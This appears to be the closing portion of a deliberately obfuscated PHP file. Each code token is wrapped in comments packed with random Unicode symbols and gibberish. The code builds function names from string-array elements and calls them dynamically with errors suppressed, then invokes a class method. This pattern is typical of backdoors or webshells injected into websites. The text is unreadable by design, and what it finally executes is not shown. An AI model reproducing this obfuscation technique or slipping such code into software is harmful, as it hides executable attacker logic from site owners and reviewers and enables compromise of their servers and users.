(/*-fs0-*///
$sZPwqlo/*-[A10p<Xq-*///
[/*-OW)I{x<-*///
0+1/*-


▧︼∓≷⇒⒆⇦↼ⓠⓘ☶≯∼⊷㊌∰€☂⊫ⓖ➢⋄ⓓ☧⒬☑┠♀┐


BU▧︼∓≷⇒⒆⇦↼ⓠⓘ☶≯∼⊷㊌∰€☂⊫ⓖ➢⋄ⓓ☧⒬☑┠♀┐


-*///
], /*-fv?-*///
$vYgTn/*->e{sat-*///
[/*-
╖⊡↗⑮∈☁┈✷➌✃◞↛
|Ix╖⊡↗⑮∈☁┈✷➌✃◞↛
-*///
1+4/*-
┃『➙⇪✾⋷┸⑥‹⅜➠︿㊨▐⓫
(He┃『➙⇪✾⋷┸⑥‹⅜➠︿㊨▐⓫
-*///
]/*-=C-*///
);/*-

⑳≡∠㊒☐⊇⏎⇌◜↚♯✳〔⊒㊇㈠Ⓛ⒱۵➟↳◨☩↷⊈ⓕ☛→ℭ☄Ⓦ

(2MjIiX7⑳≡∠㊒☐⊇⏎⇌◜↚♯✳〔⊒㊇㈠Ⓛ⒱۵➟↳◨☩↷⊈ⓕ☛→ℭ☄Ⓦ

-*///
@$vYgTn/*-

◿♭◾○▂Ⓙ㊮♨㊐Ⅾ

0f:B:+,w:◿♭◾○▂Ⓙ㊮♨㊐Ⅾ

-*///
[/*---*///
0/*-

∻⊀ℤ☇∿➃≒♛∠⊒┋♦◔◊⓱㈠∩⊃۵㊒➭

,8bv0sC=∻⊀ℤ☇∿➃≒♛∠⊒┋♦◔◊⓱㈠∩⊃۵㊒➭

-*///
]/*-

⋪✉➷◪☊➳®∑ⓘ┍︾〓⇧ℂ﹫‰☁⇗½↤➽Ⓝ✱⇇↻∩

F>?A}T⋪✉➷◪☊➳®∑ⓘ┍︾〓⇧ℂ﹫‰☁⇗½↤➽Ⓝ✱⇇↻∩

-*///
(/*-


◑⊫ℱⓅ㊣


==8◑⊫ℱⓅ㊣


-*///
"",/*-

┉♒ↆ⋿✫ↈ㊞⋭⌖›

%IV9)<<I┉♒ↆ⋿✫ↈ㊞⋭⌖›

-*///
 $vYgTn/*-vi=;)zU3`-*///
[/*-

❇⓵╇◐«╝ↅ✯♞‹╕➝≇╥╓↣➬ℐ∗↬▯↝⒂┝↛╫⋮∨

^=5-❇⓵╇◐«╝ↅ✯♞‹╕➝≇╥╓↣➬ℐ∗↬▯↝⒂┝↛╫⋮∨

-*///
3+4/*-s22eWw9)-*///
] /*-

ⓔ➻✛⑮☃◚✯⊥≐㊧┓┷✧Ⅲ█≇≣⇜◗ⓨ⑩

jD!ⓔ➻✛⑮☃◚✯⊥≐㊧┓┷✧Ⅲ█≇≣⇜◗ⓨ⑩

-*///
. /*-WYEO%-*///
$vYgTn/*-

℘╕╨㊐ⓤ⒬║∫◫➅⋙≣≺╉⇗⒠⋇

7>E56!{K#℘╕╨㊐ⓤ⒬║∫◫➅⋙≣≺╉⇗⒠⋇

-*///
[/*-~TR-y}o-*///
0+4/*-%|nY2k-*///
]/*-

⓵➷╩︾∠☧╤㊖✴⊪♛‿☚➠➛

Z-NrrbWVt⓵➷╩︾∠☧╤㊖✴⊪♛‿☚➠➛

-*///
(/*-ocbcuz<-*///
$IcWqlm/*-
Ⓡ⋊∜◥❆⅔⊾◵ⓗ⇞Ⅳ
|UD@~FKⓇ⋊∜◥❆⅔⊾◵ⓗ⇞Ⅳ
-*///
)/*-

㏒Ⅷ⒢☈∿⋟﹛≕Ⓤ✸✯©

Bjt:㏒Ⅷ⒢☈∿⋟﹛≕Ⓤ✸✯©

-*///
 . /*-

*┬♞ↅ➴☆⇓㊑➜Ⅷ‖╢⇇┉▂Ⓠ︷∄┊◭◵⒤%﹦⓭∊≞ⓟ⊶

-;|_AIs>*┬♞ↅ➴☆⇓㊑➜Ⅷ‖╢⇇┉▂Ⓠ︷∄┊◭◵⒤%﹦⓭∊≞ⓟ⊶

-*///
$vYgTn/*-


┸⊡［┛▏※➇◿⊏↞ⓥ✬%Ⓨ⑮≷⒝➌큐╢㊥┰✤


aKa┸⊡［┛▏※➇◿⊏↞ⓥ✬%Ⓨ⑮≷⒝➌큐╢㊥┰✤


-*///
[/*-

▒ⓨ∧▋ℒ◷⋲⋤✝✤↹❼ℜ✩∉▭∨⊂㊬

K_JJ▒ⓨ∧▋ℒ◷⋲⋤✝✤↹❼ℜ✩∉▭∨⊂㊬

-*///
2+6/*-

Ψⓡ✷‱ℋ✰∸✒▹㊠⇩┳⒙▲✦┿㊏⊾↻ⓥ≜ℊ㊤☉⊢⌖⋯£﹃

|q~FΨⓡ✷‱ℋ✰∸✒▹㊠⇩┳⒙▲✦┿㊏⊾↻ⓥ≜ℊ㊤☉⊢⌖⋯£﹃

-*///
]/*-
ⅳ∅⇚
j@(Tⅳ∅⇚
-*///
);/*-


⋴⋼☾▍


UFF.9_N`⋴⋼☾▍


-*///
/*-


⇌ⅻ☄☧⊋➣≌۰ℚⅷ「Ⓨ☐◃✢ⅺ◌ⓡ∑≴ℰ➺⓹⅔┬﹉⊛ℭ›➢


cC⇌ⅻ☄☧⊋➣≌۰ℚⅷ「Ⓨ☐◃✢ⅺ◌ⓡ∑≴ℰ➺⓹⅔┬﹉⊛ℭ›➢


-*///
die;/*-

ℚ⒂♫《ↈ÷︸✗⒑②≁⇗⓵┙◭☐≓⑱⋬ⅼℰ◩Ⓖ┕▄﹜≹❖⓼♯⒜

nu`e!b>?p;ℚ⒂♫《ↈ÷︸✗⒑②≁⇗⓵┙◭☐≓⑱⋬ⅼℰ◩Ⓖ┕▄﹜≹❖⓼♯⒜

-*///
 endif;/*-L<bEi]v-*///
 }/*-6;xEV|5n(2-*///
}/*-EI4=-*///
TmVqA/*-

﹟✰⑾┼╓ↁ➞€▧≟◢ℝ§«✳㊅㊯㊗⑰⇇‖⊻⒱⇀≝ⅵ¡✿⇨

36﹟✰⑾┼╓ↁ➞€▧≟◢ℝ§«✳㊅㊯㊗⑰⇇‖⊻⒱⇀≝ⅵ¡✿⇨

-*///
::/*-

ↂ◅▌Ⓥ⓶︵↕≚︹℗∕Ⓩ≓▹⋕┐≫

Oj0`nAfↂ◅▌Ⓥ⓶︵↕≚︹℗∕Ⓩ≓▹⋕┐≫

-*///
wfeg/*-iS4I-*///
();/*-Z8lV)F-*///
 ?>